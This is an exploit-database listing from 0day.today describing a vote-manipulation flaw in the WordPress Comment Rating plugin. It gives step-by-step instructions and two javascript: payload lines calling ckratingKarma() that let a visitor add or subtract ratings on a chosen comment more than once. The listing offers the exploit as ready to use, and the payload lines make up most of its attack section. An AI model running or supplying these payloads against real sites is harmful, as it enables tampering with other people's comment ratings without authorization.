[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress plugin Comment Rating JavaScript Execution Vulnerability

Author
sasa1
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15593
Category
web applications
Date add
14-03-2011
Platform
php
# Exploit Title: Wordpress plugin Comment Rating JavaScript Execution Vulnerability 
# Author: sasa1
# mysite: www.dev-chat.com
# Vendor: http://wealthynetizen.com
# Download: http://downloads.wordpress.org/plugin/comment-rating.zip

##################################

Exploit 4 Comment Rating more than once

Steps:

1- Select the mouse => Thumb up and Thumb down for Comment Rating in page
2- view selection Source by Firefox web browser
3- Copy and input to browser for $$ JavaScript code $$

xxxx= comment number


for @@Thumb up@@

javascript:ckratingKarma('xxxx', 'add', 'wealthynetizen.com/wp-content/plugins/comment-rating/', '3_14_');

++++++++++++++ OR ++++++++++++++

for @@Thumb down@@

javascript:ckratingKarma('xxxx', 'subtract', 'wealthynetizen.com/wp-content/plugins/comment-rating/', '3_14_')


##################################

Exploit by www.dev-chat.com




#  0day.today [2024-11-16]  #